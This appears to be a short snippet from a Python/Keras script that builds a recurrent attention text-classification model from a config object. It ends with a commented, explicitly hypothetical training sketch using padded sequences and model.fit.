# model = rnn_cat_rnn(config)
model = pre_attention_inner_rnn(config)
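# A minimal training sketch (not part of the original script): it assumes a
# hypothetical padded integer matrix `X_train` of shape (n_samples, config.maxlen)
# and a 0/1 label vector `y_train`, e.g. built with
# keras.preprocessing.sequence.pad_sequences.
# from keras.preprocessing.sequence import pad_sequences
# X_train = pad_sequences(tokenized_docs, maxlen=config.maxlen)
# model.fit(X_train, y_train,
#           batch_size=config.batch_size,
#           epochs=config.nb_epoch,
#           validation_split=0.1)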